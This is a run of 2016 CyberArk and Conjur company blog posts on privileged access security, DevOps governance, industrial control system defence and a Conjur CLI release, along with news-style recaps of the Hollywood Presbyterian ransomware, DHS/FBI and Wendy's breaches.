Balancing Security, Compliance, and DevelopersAn effective model for cross-functional governance, risk management, and compliance must span not only to IT automation tools like Puppet and Chef but also to cloud services, such as AWS and Azure, in order to extend across the software delivery pipeline. In practical terms, this involves specific capabilities like managed access by developers to the AWS Administrator Console to assign resources for code moving into production, as well as programmatic integration of protected secrets into source control workflows for IT automation.  Too many times, enterprises are stuck in an “all or nothing” predicament, where either developer velocity wins out or security becomes the bottleneck.

Into the Unknown

The challenge that security and compliance teams face is not just expanding the scope of controls and visibility to new infrastructure in the form or IT automation and cloud services but also how to apply security principles, notably authorization, to processes that break new ground. Addressing security for IT Automation requires security to rethink how they can facilitate new software delivery processes in a risk-driven, repeatable model.

How to Establish a Consensus on Risk & Compliance As the name implies, DevOps models compel developers and IT operations to cooperate seamlessly and operate in sync. Platforms and tools like Puppet enable this type of tighter symbiosis through capabilities like source control, and drive mutual benefit through patterns like ‘infrastructure as code’. Folding security into the mix is critical to high-performing DevOps teams, according to Puppet Labs report on the State of DevOps in 2015.  However, it’s one of the reasons that many larger enterprises are hesitant to embrace IT automation  – it implies a change in process and cross-functional cooperation.

From an operational perspective, then, security and developer teams are looking for ways to establish a consensus on risk and compliance; and then, implement the consensus in a repeatable, transparent model – rather than cobble together multiple components with varying  degrees of support and institutional knowledge.

Trust, But Validate

Conjur’s approach is to use a tiered authorization model specifically to facilitate a consensual process for balancing access, risk management, compliance, and agility based on enterprise business needs. Through a transparent and easily edited policy framework, the Conjur role-based authorization platform is designed to enable enterprises to centrally define policies on who – or what in the case of IT automation workflows- gets access to what, and with what permissions.

Leveraging existing identity stores, Conjur uses a tiered authorization model that can facilitate a transparent process for balancing access, risk management, compliance and agility. For instance, the Conjur platform can act as a bastion host that extends the AWS delegation model to grant developer access to the AWS Console, tying access to a specific identity and removing a critical operational bottleneck. The Conjur authorization service can be used to restrict access to only those secrets and SSH keys that developers are authorized to use, with policies based on roles. Developers must authenticate through a set of unique credentials, rather than through a shared password.

For security teams, whose mandate is first and foremost defense, finding their way to enablement for cross-functional processes can be a rocky road. The Conjur approach is to smooth the path through abstracted authorization and well-defined roles for new processes and infrastructure.

 

]]>
Cyber Attackers Have Many Options, Unless You Limit Their Moves https://www.cyberark.com/blog/cyber-attackers-many-options-unless-limit-moves/ Mon, 22 Feb 2016 16:41:50 +0000 https://www.cyberark.com/blog//

Cyber Attackers Have Many Options, Unless You Limit Their Moves If you have read Verizon’s “2015 Data Breach Investigations Report,” you’ll recall the following notable findings:

  • Advanced attacks often start with phishing emails, and a campaign of just 10 emails will typically yield a greater than 90 percent chance that at least one person will become the criminal’s prey.
  • In 60% of cases, attackers are able to compromise an organization within minutes.
  • 75% of attacks spread from Victim 0 to Victim 1 within one day (24 hours).

Another troubling trend is a growing “detection deficit” between attackers and defenders. Attackers who are on a network often have more than 200 days before being discovered.

Remember, privileged accounts are everywhere – in every networked device, database, server, and social media account on-premise and in the cloud. This reality requires new layers of security. Sure, it’s a good idea to educate employees about cyber security risks and best practices, but human error will continue to be a weak link even with best efforts. Behave as if you’ve already been breached. Attackers will find a way in and take actions to escalate privileges until they achieve their goal – whatever it may be. Don’t make it easy for them. Reduce your attack surface with proactive controls and keep an eye on threat analytics for early detection. Our latest graphic offers five steps you can take to limit attackers’ options once they’re inside the network.

]]>
Hollywood Presbyterian Medical Center Breached, Pays Ransom https://www.cyberark.com/blog/hollywood-presbyterian-medical-center-breached-pays-ransom/ Fri, 19 Feb 2016 15:32:00 +0000 https://cyberarkvx2.wpengine.com/blog/hollywood-presbyterian-medical-center-breached-pays-ransom/  

We’ve already discussed Experian’s prediction that healthcare would be a major target for hackers in 2016. In light of recent events, it seems their predictions were correct. Hollywood Presbyterian Medical Center in southern California is the latest organization to fall victim to hackers.

Hollywood Presbyterian Medical Center falls victim to ransomwareIt comes as no surprise that hospitals are a target- they hold very sensitive, and very valuable patient information. Unlike in other industries, healthcare has failed to keep up with the latest IT trends. Yes, hospitals might be using the latest equipment and running the newest, and most accurate medical tests, however their IT systems have not kept up with development. With their limited budgets and resources, IT infrastructure is toward the end of the list on things to improve. This lack of attention toward infrastructure security has caused many breaches already, including last year’s Anthem breach, and has put pateints information and wellbeing at risk.

So, what exactly happened at the Hollywood Presbyterian Medical Center? Here’s everything you need to know:

According to the International Business Times, doctors at the hospital had been unable to use their computers to access digital medical records prior to uncovering the breach. The hack is believed to be a ransomware attack.

CSO online reports that the hospital, which declared the breach an internal emergency, went over a week off the network, having no digital records or access to email. Due to a lack in access to patient data some patients were sent to other hospitals.  The initial understanding that hackers wanted 9,000 bitcoin (~$3.4 Million) to restore the system were false. According to new reports, the hackers only wanted 40 bitcoin ($~17,000).

According to Forbes, the hospital fell victim to the “Locky” virus which is ransomware that comes through in an email with an attached Word document. Although the president and CEO of the hospital urged that the attack didn’t effect patient care, it seems that this claim is pretty far from the truth, as many machines in the hospital did not work, which means a halt in treatment for patients with serious illnesses, including cancer.

NBC reports that the FBI is currently investigating as to the identity of the hackers. The hospital did pay the ransom, in order to obtain the encryption key and resume normal operations.

Although the hospital’s CEO is quick to note that patient information was not leaked, there is still a looming problem. Although no medical data was exposed, the hackers clearly realized that the hospital wasn’t very secure and didn’t have the digital capacity to deal with this situation, knowing that they would eventually get paid. This sets a dangerous precedent for fellow hackers and means more hospitals will be targeted in similar attacks. It is likely that the costs associated with these types of breaches will increase, as hackers are in the ultimate position of power. Additionally, a halt in the hospitals operations can be potentially life threatening for patients. If the tools doctors and nurses need to use everyday to treat patients are unusable, and there is a week long delay in treatment, this could be potentially devastating. Hospital pays ransom after breach

This breach is even more disturbing than UKM and Anthem because although information was not leaked, hackers disabled the operations of the hospital. Their motivation wasn’t simply to leak information or to make a political statement, it was to get paid. The worse the breach, and the more devastating the effects, the higher the ransom, and the more money these hackers can eventually make. Until the healthcare industry as a whole is given the funding to take cybersecurity more seriously and enlists the help of some security professionals to help get them up to speed, they will continually leave themselves vulnerable. It is crucial that the healthcare industry put greater cybersecurity measures in place to avoid what seems to be an unavoidable abundance of future attacks.

 

]]>
eBook: Achieving Security and Productivity with Least Privilege and Application Control https://www.cyberark.com/blog/achieving-security-and-productivity-with-least-privilege-and-application-control/ Thu, 18 Feb 2016 16:01:42 +0000 https://www.cyberark.com/blog//

eBook7-iconThe least privilege principle originated in the U.S. Department of Defense in the 1970s, and it was designed to reduce the potential damage of a security breach, whether accidental or malicious, by limiting access and user rights to the lowest levels possible. Giving employees what they need to access in order to do their work, but not more. Following this principle, many enterprises have removed local administrator rights from business users on endpoints as a proactive security measure.

Removing local administrator rights from users can reduce security risks, but it can also result in unintended productivity tradeoffs. For example, there may be higher IT Help Desk costs with increased requests from users who request access to necessary business applications and productivity tools. Organizations who opt for the alternative, giving full “Administrator” rights to whomever might need them, often find that business users and IT administrators end up with far more privileges than needed, creating a large and frequently exploited attack surface. In today’s modern business environment, privilege delegation can no longer be approached as an “all or nothing” decision.

We’ve released a new eBook, “Achieving Security and Productivity with Least Privilege and Application Control,” to help organizations better understand and tackle the key challenges associated with securing and managing least privilege and applications running on endpoints and servers. Topics covered include:

  • Thirteen ways that users with administrative rights can cause damage to an organization.
  • Difficult security and productivity trade-offs tied to all-or-nothing privilege delegation.
  • The “privilege creep conundrum.”
  • The correlation between privilege volume and increased insider and advanced threats.
  • The added complexity of endpoints and servers.
  • The ubiquity of malware despite efforts to control applications.
  • The “50 shades of gray” of enterprise applications.

It’s critical to strike the right balance between security and usability to effectively reduce the attack surface while keeping users productive and reducing the burden on IT teams. “Achieving Security and Productivity with Least Privilege and Application Control” also outlines seven recommendations for developing layered security controls – and provides pointers on what to look for when adopting an integrated privilege management and application control solution.

To download the free eBook, please visit: https://www.cyberark.com/resource/achieving-security-and-productivity-with-least-privilege-and-application-control/.

If you are interested in technology that will help your organization to more effectively minimize local administrator privileges and control applications on endpoints and servers, learn more about Cyberark Viewfinity.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

]]>
6 Blogs Every Security Architect Should be Reading https://www.cyberark.com/blog/6-blogs-every-security-architect-should-be-reading/ Thu, 18 Feb 2016 19:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/6-blogs-every-security-architect-should-be-reading/  

Short on time but still want to stay in the know? We get it. Finding helpful and targeted content isn’t always easy. It’s useful to have a few key resources we can count on for the latest news, productive conversations, and valuable advice. As a security architect, you want to read content that addresses your chief concerns and keeps you up to date with the current industry threats and trends.

The best way to get this information on a regular basis, without tons of reading and researching, is to subscribe to a few different blogs, as they are typically the best resource for getting the news you want in a way that is easy to digest and understand. You might be thinking, this all sounds great but how do I find these magical treasure troves of content. Great news, we can help you with that. We’ve compiled a short list of informative, security related blogs to get you started.

Here are 6 blogs every security architect should read.

1) Krebs on Security: You’ve probably already heard of Brian Krebs, but are you a blog subscriber? If not, you should be. Krebs stays up to date with the latest news in internet security, Krebs credited as one of the first to report on the Target Breach.

2) It Security Guru displays all the breaking news the InfoSec community is talking about. The best part, all of the most relevant information is in one spot, so you don t need to scour multiple news sources for the latest in cybersecurity. 

3) An independent news site ThreatPost delivers a plethora of information regarding Business and IT Security. A combination of original stories, aggregated content, and editorials threat post engages readers in discussions about what happened, and why it matters. 

4) Schneier on Security is a blog written by renown security professional Bruce Schneier. Described as a security guru, Schneier is a thought leader in all things security, government, cryptography, and privacy.  

5) Naked Security is another well known blog and there is a reason why it is so popular. It provides the latest news, opinions, solutions, and discussions on the latest threats and security issues. 

6) This isn’t necessarily a blog, but it’s worth a mention as it is super helpful and informative, plus, Reddit allows you to interact with other security and risk professionals with the similar issues and concerns. The Information Security News subreddit focuses on real, productive conversations about technical news and information security.

Of course, you should also subscribe to our blog, since we provide helpful information about security and development.

Is there a blog you love to read that isn’t listed here. Leave a link in the comments below so we can check it out!

 

]]>
Practical Steps to Safeguard Critical Infrastructure https://www.cyberark.com/blog/practical-steps-safeguard-critical-infrastructure/ Tue, 16 Feb 2016 13:49:12 +0000 https://www.cyberark.com/blog//

In December 2015, the Department of Homeland Security, the Federal Bureau of Investigation and the National Security Agency (NSA) jointly released a report, “Seven Steps to Effectively Defend Industrial Control Systems” recommending ways to safeguard from cyber-attacks. The release of this report highlights the increased frequency of attempted attacks against Industrial Control Systems and the companies where they are used, specifically in the United States Critical Infrastructure sectors. The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) noted that 295 incidents were reported in Fiscal Year (FY) 2015.

The recommendations should be taken seriously and implemented promptly. The report warns:

“If system owners had implemented the strategies outlined in this paper, 98 percent of incidents ICS-CERT responded to in FY 2014 and FY 2015 would have been prevented. The remaining 2 percent could have been identified with increased monitoring and a robust incident response.”

With CyberArk solutions, you can address six of the seven recommended steps:

  1. Implement Application Whitelisting (AWL)

Implementing Application Whitelisting in critical, top-hierarchy control computers such as Human Machine Interfaces (HMIs) represents one of the first steps in locking down an Industrial Control System network. CyberArk Viewfinity removes local administrator rights from the HMI, and it seamlessly elevates privileges, based on policy, as required by trusted (whitelisted) applications. This measure helps to mitigate the risk of malware-based attacks.

  1. Reduce Your Attack Surface Area

The isolation of the ICS networks from any untrusted networks is one of the most important steps in safeguarding ICSs given the risks associated with direct connectivity of untrusted end points to ICS assets as well as the potentially devastating impact of an intrusion. Regulations, standards and security experts have advocated this measure as part of a defense-in-depth architecture for many years. The CyberArk Privileged Session Manager secure jump server can isolate sessions connecting to ICS networks, effectively separating users and devices from critical systems, as well as establishing an isolated network segment without the use of a VPN.

  1. Build a Defendable Environment

Network segmentation in ICS helps contain potential damage from a network breach by limiting access to other ICS network segments while allowing authorized communications to continue. The CyberArk Privileged Session Manager secure jump server provides the necessary access control and isolation between network segments and provides an added level of security not available through home-grown or commercially available jump servers. Security measures include individual accountability, access control to target systems, command- level monitoring and keystroke logging, video recording and playback as well as enforcement of established workflow processes.

  1. Manage Authentication (Secure Privileged Accounts)

Privileged credentials allow users to access the organization’s critical systems, including the industrial control system’s computers. When left unsecured, these credentials can be lost, stolen or shared with unauthorized users. The CyberArk Privileged Account Security solution allows customers to secure privileged credentials in a vault and implement controls that prevent the misuse of privileged credentials and alert on suspicious behavior. Additionally, the CyberArk solution allows organizations to add an additional layer of authentication to existing password authentication solutions. It supports various authentication technologies such as LDAP, RSA, SecurID, RADIUS, PKI, smart cards and more.

  1. Implement Secure Remote Access

Remote access allows third-parties (vendors, contractors, consultants, remote employees, etc.) to access the ICS system and other critical assets from outside of the ICS networks. The CyberArk Privileged Session Manager secure jump server provides a central point of control for protecting the ICS networks through the isolation of all sessions originating outside of the ICS network and from unmanaged devices. The jump server protects the ICS target assets in several ways: it blocks the spread of desktop malware, mitigates the risk of credential theft and monitors and records every session.

  1. Monitor and Respond

Monitoring and analytics solutions help organizations to detect malicious activity, while implementing additional measures to quickly respond and mitigate any potential damage or compromise of the asset. CyberArk Privileged Threat Analytics provides both of these capabilities. It helps to detect account and user misuse or compromise and allows incident response or security operations teams to quickly respond to in-progress attacks.

CyberArk is uniquely qualified to help secure Industrial Control Systems from cyber-attacks related to the misuse of privileged accounts. Download “NIST-800-82 Rev 2: Guide to Industrial Control System (ICS) Security” to learn more about how CyberArk can help your organization meet the unique security requirements of Industrial Control Systems.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

]]>
How to Get Developers on Board with Security https://www.cyberark.com/blog/how-to-get-developers-on-board-with-security/ Tue, 16 Feb 2016 15:31:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-to-get-developers-on-board-with-security/  

Getting developers on board with new security initiatives can be tricky. Developers want to innovate and since their performance is based on their productivity, security is often viewed as a hindrance that cripples their ability to excel. As the technical landscape has become increasingly more aggressive, and enterprises need to keep up with their competition, slowing down isn’t an option.

Data breaches are now commonplace, and it seems that every week more sensitive customer data is left vulnerable. The negative media attention associated with data breaches has finally caught they eye of high level executives and they are pushing for change. For the first time in years, security is becoming a mainstay in the business conversation. What does this mean for the security and risk professional? Security is now everybody’s headache. It is your job to make sure that everyone is excited and willing to follow the security best practices that you develop. Sounds easy, right? Well, it isn’t. Security isn’t necessarily a sexy sell, especially when you are trying to sell it to someone whose job is to make cool stuff. However, as security becomes more closely scrutinized, it is crucial that developers get on board. So, how do you get your developers to care about security. Here are 6 tips to get you started.

1. Security Comes From The Top 

Make sure top level business executives understand how important security is to the the success of the organization. Once they understand, have them communicate this importance to the entire organization.  They should be talking about security in company wide meetings and using security terms in internal literature. If high level executives are painting security as a priority, it will be perceived as such, and will therefore become a point of concern for every person operating in the business. It is one thing to push for greater security as a security and risk professional, however, having security discussed at the very top, among executives that otherwise aren’t involved in the tech side of things, will help to enforce the idea that security is everyone’s responsibility and is a measured benchmark of success for the enterprise.

2. Put your Money Where Your Mouth Is

If you are going to make security part of the developers’ responsibility, you must provide them with the necessary budget for the resources and tools they need to get the job done. If security is a business priority, each department should be given proper budget to allow them to purchase the tools they need to succeed and continue innovating.

3. Create a Well-Thought-Out Security Program

Make sure you engage with developers and create a program that outlines how important security is to the organization, the impact it has on business, and how security can be weaved into the development process. Be mindful of the struggles that development will face in learning new tools and changing their processes. With these hurdles in mind, craft proper training for these new tools and set up regular meetings to make sure things are going according to plan. When developing your security program, be sure to include information about recent data breaches that came from vulnerable code- this type of practical, real world information will be key in getting developers passionate about secure innovation.

4. Understand It’s A Process

As a security and risk professional you must communicate that security is a process with many different pieces; development is one of those pieces.  Therefore, each step in the development process should be made more secure. Have multiple security assessments during the various stages of the development cycle. By re-evaluating at each step, you can easily determine where bugs pop up, come up with ways to lessen those flaws earlier in the process, and better ingrain security in every part of the process.

5. Encourage Accountability

Make sure developers are held accountable for hitting specific security metrics and acting on the security protocols you have put into place. Reward them for their contributions, recognize their successes, and make sure security is part of their yearly evaluations.

6. Talk About It

Encourage developers to communicate with one another, the security team, and other groups within the How to Get Developers Interested in Securityorganization. Promote an open dialogue during which questions, criticisms, and new ideas are equally welcome. Understand that there is no one, perfect security path and that changes will be made each step of the way. Continually reevaluate what is working, and what isn’t, based on the feedback you receive from the dev and security teams. Iterate on these processes until you find the system that works best for your enterprise.

For the security and risk professional, aligning development with security is a difficult, but invaluable part of the process. Have a pulse on everything that is going on in the organization, including the struggles, pressures, and successes of the development team. Keep in mind that management has made innovation and faster time to market a priority for developers…things that security can very often, slow down. However, in making security a priority across the organization, and establishing a more secure enterprise as a benchmark of success, developers will be much more likely to remain vigilant in following the specific security metrics as outlined in your program.

 

]]>
New Conjur CLI v4.29.0 Release https://www.cyberark.com/blog/new-conjur-cli-v4-29-0-release/ Thu, 11 Feb 2016 16:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/new-conjur-cli-v4-29-0-release/  

Earlier this week we released a new version of the Conjur CLI. You can download it now from the Conjur developer site.

Conjur CLI v4.29.0 contains many new features and bugfixes. This update takes advantage of several new features in Conjur v4.6.0, also released this week.


Here are the highlights:

Rotate API keys more easily

User and host API keys can now be rotated from the CLI. You no longer need access to a Conjur server to refresh API keys or reset user passwords. New API keys are randomly generated.

$ conjur user rotate_api_key --user vincent.cruz
168cn7m1edk95c343z60m2rgjgaa2b2sz164wg60v1v8jkv92z2h64q

$ conjur host rotate_api_key --host prod/redis/redis004
kynrha2kt3cwedky95t2ere7wfbe0b6333qrf4qv39nhg38sndzp

Set expiration timestamps on variables

Variables can now be set to expire. Once a variable has expired, it can no longer be used and a new value must be added. All expiration events are recorded in the audit log. This feature requires Conjur v4.6.0 or newer.

$ conjur variable expire --days 90 prod/docker-registry/ssl-cert
{
 "id": "prod/docker-registry/ssl-cert",
 "resource_identifier": "conjurops:variable:prod/docker-registry/ssl-cert",
 "expiration/timestamp": "2016-05-09T22:11:32Z"
}

# Show me the variables that expire within the next 100 days
$ conjur variable expirations --days 100
[
 {
  "id": "conjurops:variable:prod/docker-registry/ssl-cert",
  ...
 }
]

Whitelist access to Conjur by IP range

User and host access to Conjur can now be restricted by one or more CIDR ranges. In short, if you set an IP range for a user or host, they can only contact your Conjur environment from that range. CIDR limiting also works with host factory tokens, making them more secure.

# Restrict user access by company subnet
$ conjur user update --cidr 257.32.12.0/32 vincent.cruz
User updated

# Restrict host access by VPC subnet
$ conjur host update --cidr 10.10.1.0/32 prod/redis/redis004
Host updated

# Restrict host factory token usage by VPC subnet
$ conjur hostfactory tokens create --cidr 10.10.1.0/32 prod/redis-factory
[
 {
  "token": "2sp6r1e0zjf0gjqwa01mq7xe9mqtt95nc9f6v6gc7rbbp7rg3",
  "expiration": "2016-02-11T16:52:14+00:00",
  "cidr": [
   "10.10.1.0/32"
  ]
 }
]

Check server health and version info

You can now check the health of any node in your Conjur environment from the CLI (and API). Conjur service version information is now available as well.

# Checking the health of the Conjur master
$ conjur server health
{
 "services": {
  "host-factory": "ok",
  "pubkeys": "ok",
  "authn": "ok",
  "audit": "ok",
  "core": "ok",
  "authz": "ok",
  "ldap": "ok",
  "expiration": "ok",
  "ok": true
 },
 "database": {
  "ok": true,
  "connect": {
   "main": "ok"
  },
  "replication_status": {
   "pg_current_xlog_location": "0/1E3E6A0",
   "pg_current_xlog_location_bytes": 31712928
  }
 },
 "ok": true
}

# View the installed version of the CLI and Conjur server
$ conjur version
Conjur client version 4.29.0
Conjur appliance version: 4.6.0-200-g84ad06c
Conjur service versions:
 audit: 4.6.0-21-g2235f6e
 authn: 4.6.0-40-ge3e4255
 authn-ldap: 0.4.0-9-gf70b32e
 authn-tv: 4.6.0-38-ge4df928
 authz: 4.6.0-5-gdd22bca
 cli: 4.29.0-dev-94-ga4757fe
 core: 4.6.0-15-gfa546f0
 evoke: 4.7.1-30-g9b17039
 expiration: 0.2.1-50-g0ca4bde
 host-factory: 4.6.0-47-gaf3b9a1
 ldap-server: 4.6.0-19-ga7002c9
 pubkeys: 4.6.0-7-g0ca60a4

View the CHANGELOG on GitHub for a full list of changes. The CLI reference page contains full details for each new command. All new features also have corresponding routes in the Conjur API.

Download the new CLI, try it out, and let us know what you think!

 

]]>
The FBI and Department of Homeland Security Breached https://www.cyberark.com/blog/the-fbi-and-department-of-homeland-security-breached/ Wed, 10 Feb 2016 18:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-fbi-and-department-of-homeland-security-breached/  

After the OPM breach, you would assume the government immediately took measures to make sure there wasn’t a second hack. It looks like whatever efforts they made didn’t work, because they were breached yet again. The names, titles, phone numbers, email addresses, and job descriptions of thousands of FBI employees were leaked. But wait, it gets worse. Similar information was also breached for 9,000 homeland security workers just the day before. Luckily, the government has impeccable timing, as the breach hasn’t gotten much press, largely overshadowed by President Obama’s announcement of his Cybersecurity National Action Plan.  

Here’s everything you need to know about the breach:

A Justice Department staffer’s email account was compromised by the hackers, the group releasing the information on Superbowl Sunday, and Monday, as they promised to do on social media. 

According to US News, the hackers appear to have significant political motivations. The group tweeted that they would continue to release the information they took until there is a free Palestine, urging the U.S. to end diplomatic relations with Israel. They also tweeted 

The same hackers released the information of 9000 DHS employees and 20,000 FBI workers. The message on top of the data dump reads “Long Live Palestine, Long Live Gaza”. The Department of Justice has stated that, as of now, it doesn’t look like any sensitive identifiable information was breached. The hackers also claim that they have access to hundreds of gigabytes of DOJ data, which they are waiting to release. 

The pro-Palestine hacker group taking credit for the attack is called “DotGovs”. The group has been very active on twitter, typically using #FreePalestine in their tweets.  Following the breach they tweeted, “When will the US government realize we won’t stop until they cut relations with Israel.”

Government officials have commented on the breach and are working to make it seem unimportant, comparing the leaked information to what you could find in an old phone book. However, it should be noted that while some of the information was out of date, other information was extremely accurate. 

 Additional thoughts… 

It seems that the most perplexing, and worrisome, aspect of this hack is that the government is acting like it isn’t a very big deal. You would think that following the OPM breach and the announcement of the President’s new cybersecurity plan, they would use this cyberattack as a catalyst to move the plan forward, instead of painting it as a non issue. The media, mostly concentrating on the announced cybersecurity plan, seems to have forgotten about this breach, as reporting has been lax.

The scary part of this breach isn’t necessarily the content that was released, but rather, the response and the fact that it occurred in the first place. The OPM breach was devastating, exposing 25.7 million records. Following this attack, putting basic information security fundamentals in place should have been top priority.

It is very dangerous for DOJ officials to portray this breach as insignificant. There is still a large amount of unknown data that the hackers allegedly possess, information poor information security practices allowed them to access. The government must take these events more seriously. Hackers will continue to work to breach the government and soon, as we have seen in the  past, more than just names and email addresses will be compromised.

This breach should be used as a conversation starter to put more secure practices in place.As the presidential election continues to heat up, and international struggles move forward, we are more vulnerable than ever to hackers trying to access sensitive data for political gain. Hopefully this newly released cybersecurity plan will spark more conversations around security, help ensure that information is more closely protected, and lessen the likelihood of cyberattacks in the future.

 

]]>
Conjur to Exhibit at RSA 2016 https://www.cyberark.com/blog/conjur-to-exhibit-at-rsa-2016/ Tue, 09 Feb 2016 15:39:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-to-exhibit-at-rsa-2016/  

On February 29th we will depart cold, snowy Boston and head to warm and sunny San Francisco. We are very excited to attend RSA Conference 2016 with our friends at SSH Communications Security. You can find us at their booth in the South Expo Hall, chatting about our recent partnership with the creator of the SSH protocol and discussing how you can better manage access control for your automated infrastructure.

Must See Sessions at RSA 2016We are so excited about our partnership with SSH as Conjur will become integrated with their CryptoAuditor and UKM products. Working with SSH’s CryptoAuditor encrypted channel monitoring solution, Conjur can operate in any elastic cloud environment via a lightweight deployment while maintaining its regular flexibility and ease of use. Additionally, Conjur will enable you to secure the connection from UKM to the Hosts and lockdown will eliminate the need to have authorized keys managed on each box going forward.

Will you be at RSA? Conjur CEO Elizabeth Lawler and VP Josh Bregman will be there along with business development representative Wes Davis. To set up some time to chat with them, just click here.

Forgot to register? Don’t worry, there are still passes available. Sign up before they sell out and everyone decides to head to the West Coast and escape the snow.

 

]]>
Give Internal Stakeholders Reasons to Make Security Personal https://www.cyberark.com/blog/give-internal-stakeholders-reasons-make-security-personal/ Mon, 08 Feb 2016 14:49:02 +0000 https://www.cyberark.com/blog//

It’s not unusual for privileged users themselves to be the most resistant cohort when it’s time to improve privileged access controls, and it’s easy to understand why. Without access to administrative privileges, IT administrators and database administrators (DBAs) may be unable to carry out certain tasks or use certain applications needed for their day-to-day roles. Many IT administrators, for example, believe they could do their job better with unfettered access and freedom to choose their own tools. They may view additional steps or restrictions as a burden. To address user objections related to implementing privileged access controls, it’s important to focus on communicating and contextualizing privileged account security.

Jay Leek, CISO of The Blackstone Group, stressed the importance of effective communications in a CSO article, noting that security professionals need to change how they talk about key issues: “If you can’t communicate effectively about what you’re doing, people are going to duck when they see you coming because you’re not making any sense… Your ability to articulate what their role is and why it’s important to the organization in a way they can understand is the only way to change organizational behavior.” He continued, “You have to align what you do and change the conversation to something that’s more meaningful to people outside of the security organization.”

When communicating internally with stakeholders, create messages that help them to understand how improving security controls will help them personally. For example, challenge the traditional perceptions around productivity loss. Demonstrate that the recommended security practices can actually streamline tasks and make how they operate with credentials more efficient – with benefits such as single sign-on and less tedious password changes.

Jim Motes, CISO of Rockwell Automation, notes in the CISO View report, “An advantage IT admins can really understand is nonrepudiation.” He continues, “Explain to them, for shared accounts, if we’re able to track exactly who is doing what and when, if something goes wrong with an account, you won’t be a suspect. For investigations, we’ll have a forensic trail to know it was definitely not you.” Also in the report, panelists explain that IT administrators are in a position of high trust within the organization, but often haven’t completely thought through the ramifications or how they would respond if their account was used inappropriately. Helping them to understand this highlights the critical need to make changes.

To be successful in improving privileged access controls, it’s important for the CISO and security team to focus on organizational culture and to help people navigate through the change curve. Above all, stakeholders need to have a sense of ownership in order for the program to be effective. Request their input and then incorporate it into the plans. Make sure the people who follow the new processes get a chance to review them ahead of time.

I found this chapter of the eBook particularly interesting. As a CISO, I’m sure you hear a lot about strategies for communicating with and winning over executives. Communications is an important part of the execution and success of a security program, so it’s also important to win the support of IT administrators and DBAs. For those interested in a more in-depth read on this topic, download the free CISO View report here.

]]>
4 Ways Technology Has Changed the Financial Services Sector https://www.cyberark.com/blog/4-ways-technology-has-changed-the-financial-services-sector/ Wed, 03 Feb 2016 17:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/4-ways-technology-has-changed-the-financial-services-sector/  

The emergence of new technologies has most certainly had an effect on business. For many industries, new technology has drastically changed enterprise operation and structure. The financial services industry has been largely affected by the digital age. Although new technologies and the shift toward the cloud has made things easier, and has allowed these companies to operate on a scale that is otherwise unattainable, the shift does come with its own set of issues.

Here are 4 Ways Technology has Shaped the Financial Services Sector.

1. Virtual, Not Physical, Data 

Years ago, banks were concerned with securing their physical data… guarding servers and tangible files filled with personal and sensitive data. This worry has shifted, as data is largely virtual.  Of course, management at individual branches is worried about the occasional break in. But enterprises as a whole are more concerned about large scale attacks, as the dollar amount of a cyberattack on the entire institution is potentially devastating. Automation has changed almost every aspect of financial services. Banks have computerized tellers, digital records, electronic payments, etc. and all of this data can be sent across the world with the click of a button. Banks store and have access to a plethora of personal information- not only do they deal with people’s money, but they also hold onto a great deal of sensitive, identifiable information- so when a financial enterprise is hacked, a lot more than money is at stake.

2. It’s Gone Global

Technology has changed the industry completely and has introduced some new key players. Now, banks can operate across the world, the cloud making it possible to share information anywhere and everywhere. In recent years, new financial hubs have emerged, as business can now be conducted globally. As more players enter the space, there is an increase in the size of infrastructures and IT teams, an increase in the amount of data that is shared, and an increase in the surface area that is vulnerable to attacks.

3. Security is Everyone’s Problem 

Security has become an enterprise wide concern- Years ago, the only people truly worried about security were the people who worked in the server room. Things are different now. As the vast amount of data the financial services industry stores is highly sensitive, and can be easily shared internally and accessed by hackers, security needs to prevalent in every single aspect of the business. Now, financial service sector is concerned with both insider and outsider threats. As hackers have become increasingly more stealthy and resourceful, enterprises must make sure their security is robust enough to thwart their efforts.

4. The Internal Hierarchy has Shifted 

The IT team has become just as important as financial experts in the financial services industry. This is especially true as more and more companies make the transition to the cloud. These enterprises need large IT teams to manage data and keep up with current trends. The digitization of the industry means that enterprises are able to move fast, innovate, and create new and exciting features. Having large, agile IT teams is crucial to a financial institution’s success in this new, more competitive marketplace.

Hackers have become smarter and more determined and if enterprises don’t take security seriously, they are at risk of a breach. The financial services industry has a lot more at stake than other types of businesses. Unlike retailers, a bank’s main job is to hold our most personal information and keep it safe. Thus, a
breach would be devastating in this industry, as consumer trust  would likely decline drastically if their sensitive financial information was compromised. Keep in mind, we aren’t just talking about individuals who utilize these finance firms, but also large corporations. Losing these customers due to a cybersecurity issue would be overwhelming.  

These four changes reveal how important infrastructure security has become for financial services. Although the cloud has allowed these corporations to operate on a much larger scale, and these new capabilities have brought an increase in revenue, it does come with a price. Although enterprises can handle more data, they need to be able to effectively secure it and avoid the public nightmare that is a data breach.

 

]]>
Wendy’s Customers: Keep an Eye On Your Bank Statements https://www.cyberark.com/blog/wendys-customers-keep-an-eye-on-your-bank-statements/ Tue, 02 Feb 2016 17:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/wendys-customers-keep-an-eye-on-your-bank-statements/  

Need another reason to put down the burger and stick with your new year resolution? Looks like adhering to that healthy eating plan has gotten a lot easier. Wendy’s recently announced they they might have fallen victim to a credit card breach. They are still investigating the incident and aren’t sure if the situation is contained or if credit cards are still vulnerable.

Although there is still a lot of speculation surrounding the cyberattack, here is what we know so far: 

Krebs on Security reports that Wendy’s was notified of a pattern of suspicious behavior on credit cards that were used at various restaurant locations. Wanting to be proactive in solving the problem, Wendy’s immediately hired a cybersecurity firm to do some digging and figure out what exactly happened.

Initially, it was thought that credit cards used at US Midwest locations were the only ones compromised, but it was soon discovered that cards used on the East Coast also suffered fraudulent charges. Although the breach has yet to be officially concerned, it is looking pretty likely that the company was victim to a hack.

Wendy’s is investigating transactions that occurred late last year, so it doesn’t look like this is the type of cyberattack dating back years. Customers who have used their credit or debit cards at Wendy’s are urged to keep a close eye on their credit card statements, and not wait until the end of the month to review their charges. Especially for fraudulent charges on debit cards, it can be very difficult to actually get your money back, so a prompt response is crucial.

